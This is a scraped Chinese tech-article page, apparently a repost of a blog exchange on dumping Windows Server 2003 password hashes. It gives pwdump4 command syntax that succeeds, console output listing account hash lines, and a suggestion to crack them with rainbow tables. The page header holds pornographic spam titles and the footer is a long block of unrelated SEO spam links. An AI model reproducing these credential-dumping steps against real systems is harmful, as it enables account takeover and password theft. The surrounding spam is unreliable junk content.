电脑知识|欧美黑人一区二区三区|软件|欧美黑人一级爽快片淫片高清|系统|欧美黑人狂野猛交老妇|数据库|服务器|编程开发|网络运营|知识问答|技术教程文章 - 好吧啦网

您的位置:首頁技術文章
文章詳情頁

Dump Hash From Windows 2003(圖)

瀏覽:7日期:2023-10-04 18:05:52
閑著無聊,看看眾人的blog,忽發現 包子 同志Blog上一則日志:

獲取windows密碼hash的兩個方式post by baozi @ 28 九月, 2005 09:47 在給客戶做滲透測試的時候,遇到一個win2k3機器,pwdump4讀不出密碼bash,lc5裝上去一讀的話LC5就掛掉,突然想到saminside這個東西,似乎記得他有兩個讀本地密碼散列的方式的,一個是一般的通過LSASS讀,還有一個就是通過shedule服務來讀,還沒去搜索后者什么原理,拿上去一試果然行,另存為pwdump文件回來用ranbowcrack跑,哈哈

國內似乎還沒有利用shedule服務讀密碼的cmd程序吧,哪個大蝦弄一個就好了,畢竟saminside圖形的不方便。

其實以前我也遇到過讀不出來密碼hash的 w2k3 的機器,只不過你參數用錯了 hieei

pwdump4 ip /o:fuckbaozi /u:administrator

用這種格式一般來說可以dump出hash來 ip 換成 127.0.0.1 :D

如果你用 /l 參數, 大部分是dump不出來的,即使dump出來,hash也是不全的.

C:/>pwdump4 127.0.0.1 /o:fuckbaozi /u:administrator

PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.by bingle@email.com.cnThis program is free software based on pwpump3 by Phil Staubsunder the GNU General Public License Version 2.

Please enter the password >*******local path of //127.0.0.1/ADMIN$ is: C:/WINDOWSconnect to 127.0.0.1 for result, plz wait...SRV>Version: OS Ver 5.2, Service Pack 1, ServerTerminalLSA>Samr Enumerate 4 Users In Domain DREAM.All Completed.

C:/>type fuckbaoziAdministrator:500:A02F5A52E33540C0AAD3B435B514042E:00F0E9AB3FE77043C228DDB70E5C41A6:::Guest:501:AAD3B445B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::kaka:1004:9FFBED36199C0D0723WD3B83FA6627C7:E4CCAB020C323DC2411876AE032CD5FF:::SUPPORT_388945a0:1001:AAD3B435B51404EEAAD3B435B51404EE:3279F1AC07C5E7C197752437531BB8B3:::

C:/>pwdump4 /l /o:fuckbaozi /u:administrator

PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.by bingle@email.com.cnThis program is free software based on pwpump3 by Phil Staubsunder the GNU General Public License Version 2.

SRV>Version: OS Ver 5.2, Service Pack 1, ServerTerminal

C:/>type fuckbaoziAdministrator:500:A02F5322E10540A0AA33B435B51404EE:00F0E9433FE62378C228D4370E5C41A6:::Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::

C:/>

如此而已,用pwdump4 ip /o:file /u:user的方式,我還沒有發現有不能dump出密碼hash的2003系統.

標簽: Windows系統
主站蜘蛛池模板: 恒温恒湿试验箱_高低温试验箱_恒温恒湿箱-东莞市高天试验设备有限公司 | 神马影院-实时更新秒播 | 喷码机,激光喷码打码机,鸡蛋打码机,手持打码机,自动喷码机,一物一码防伪溯源-恒欣瑞达有限公司 | 瓶盖扭矩测试仪-瓶盖扭力仪-全自动扭矩仪-济南三泉中石单品站 | 航拍_专业的无人机航拍摄影门户社区网站_航拍网 | 胶辊硫化罐_胶鞋硫化罐_硫化罐厂家-山东鑫泰鑫智能装备有限公司 意大利Frascold/富士豪压缩机_富士豪半封闭压缩机_富士豪活塞压缩机_富士豪螺杆压缩机 | 防腐储罐_塑料储罐_PE储罐厂家_淄博富邦滚塑防腐设备科技有限公司 | 实战IT培训机构_IT培训班选大学生IT技术培训中心_中公优就业 | 宁波普瑞思邻苯二甲酸盐检测仪,ROHS2.0检测设备,ROHS2.0测试仪厂家 | 深圳工程师职称评定条件及流程_深圳职称评审_职称评审-职称网 | 自恢复保险丝_贴片保险丝_力特保险丝_Littelfuse_可恢复保险丝供应商-秦晋电子 | 国产离子色谱仪,红外分光测油仪,自动烟尘烟气测试仪-青岛埃仑通用科技有限公司 | 压力控制器,差压控制器,温度控制器,防爆压力控制器,防爆温度控制器,防爆差压控制器-常州天利智能控制股份有限公司 | 空调风机,低噪声离心式通风机,不锈钢防爆风机,前倾皮带传动风机,后倾空调风机-山东捷风风机有限公司 | 洁净化验室净化工程_成都实验室装修设计施工_四川华锐净化公司 | 合肥制氮机_合肥空压机厂家_安徽真空泵-凯圣精机 | 手持式3d激光扫描仪-便携式三维立体扫描仪-北京福禄克斯 | led冷热冲击试验箱_LED高低温冲击试验箱_老化试验箱-爱佩百科 | 行星齿轮减速机,减速机厂家,山东减速机-淄博兴江机械制造 | 特材真空腔体_哈氏合金/镍基合金/纯镍腔体-无锡国德机械制造有限公司 | 单级/双级旋片式真空泵厂家,2xz旋片真空泵-浙江台州求精真空泵有限公司 | 山东PE给水管厂家,山东双壁波纹管,山东钢带增强波纹管,山东PE穿线管,山东PE农田灌溉管,山东MPP电力保护套管-山东德诺塑业有限公司 | 直线模组_滚珠丝杆滑台_模组滑台厂家_万里疆科技 | 锻造液压机,粉末冶金,拉伸,坩埚成型液压机定制生产厂家-山东威力重工官方网站 | 铝合金重力铸造_铝合金翻砂铸造_铝铸件厂家-东莞市铝得旺五金制品有限公司 | 三防漆–水性三防漆–水性浸渍漆–贝塔三防漆厂家 | 安徽华耐泵阀有限公司-官方网站 安德建奇火花机-阿奇夏米尔慢走丝|高维|发那科-北京杰森柏汇 | 袋式过滤器,自清洗过滤器,保安过滤器,篮式过滤器,气体过滤器,全自动过滤器,反冲洗过滤器,管道过滤器,无锡驰业环保科技有限公司 | 世纪豪门官网 世纪豪门集成吊顶加盟电话 世纪豪门售后电话 | 苏州西装定制-西服定制厂家-职业装定制厂家-尺品服饰西装定做公司 | 超声波乳化机-超声波分散机|仪-超声波萃取仪-超声波均质机-精浩机械|首页 | 法兰连接型电磁流量计-蒸汽孔板节流装置流量计-北京凯安达仪器仪表有限公司 | 济南宣传册设计-画册设计_济南莫都品牌设计公司 | 北京四合院出租,北京四合院出售,北京平房买卖 - 顺益兴四合院 | 国标白水泥,高标号白水泥,白水泥厂家-淄博华雪建材有限公司 | 红外光谱仪维修_二手红外光谱仪_红外压片机_红外附件-天津博精仪器 | 托利多电子平台秤-高精度接线盒-托利多高精度电子秤|百科 | 英国公司注册-新加坡公司注册-香港公司开户-离岸公司账户-杭州商标注册-杭州优创企业 | 航空连接器,航空插头,航空插座,航空接插件,航插_深圳鸿万科 | Eiafans.com_环评爱好者 环评网|环评论坛|环评报告公示网|竣工环保验收公示网|环保验收报告公示网|环保自主验收公示|环评公示网|环保公示网|注册环评工程师|环境影响评价|环评师|规划环评|环评报告|环评考试网|环评论坛 - Powered by Discuz! | 集装箱箱号识别_自重载重图像识别_铁路车号自动识别_OCR图像识别 |